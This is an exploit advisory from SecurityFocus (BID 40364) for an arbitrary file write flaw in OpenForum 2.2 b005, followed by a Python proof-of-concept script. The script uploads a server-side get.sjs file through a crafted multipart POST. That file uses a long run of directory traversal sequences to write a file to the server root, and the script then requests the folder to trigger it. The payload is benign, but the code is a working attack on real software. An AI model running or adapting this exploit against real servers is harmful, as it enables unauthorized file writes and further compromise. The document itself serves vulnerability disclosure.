# source: https://www.securityfocus.com/bid/40364/info
#
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
#
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Arbitrary File Write #
# Software.................Open Forum Server 2.2 b005 #
# Download.................http://code.google.com/p/open-forum #
# Date.....................5/23/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be #
# exploited to write to the local file system of the server. #
# #
# #
# ##Exploit## #
# #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. #
# #
# #
# ##Proof of Concept## #
# #
import sys, socket
host = 'localhost'
port = 80
def send_request(request):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(32) # sometimes it takes a while
s.connect((host, port))
s.send(request)
response = s.recv(8192) + s.recv(8192) # a hack within a hack
return response
def write_file():
try:
content = '----x--\r\n'\
'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
'Content-Type: application/octet-stream\r\n\r\n'\
'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
'data = "hello, world";\r\n'\
'user = transaction.getUser();\r\n'\
'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
'transaction.sendPage("File Written");\r\n\r\n'\
'----x----\r\n'
response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Content-Type: multipart/form-data; boundary=--x--\r\n'
'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)
if 'HTTP/1.1 302 Redirect' not in response:
print 'Error writing get.sjs'
return
else: print 'get.sjs created'
response = send_request('GET OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
if 'File Written' not in response:
print 'Error writing to root'
return
else: print 'x.txt created in root'
except Exception:
print sys.exc_info()
write_file()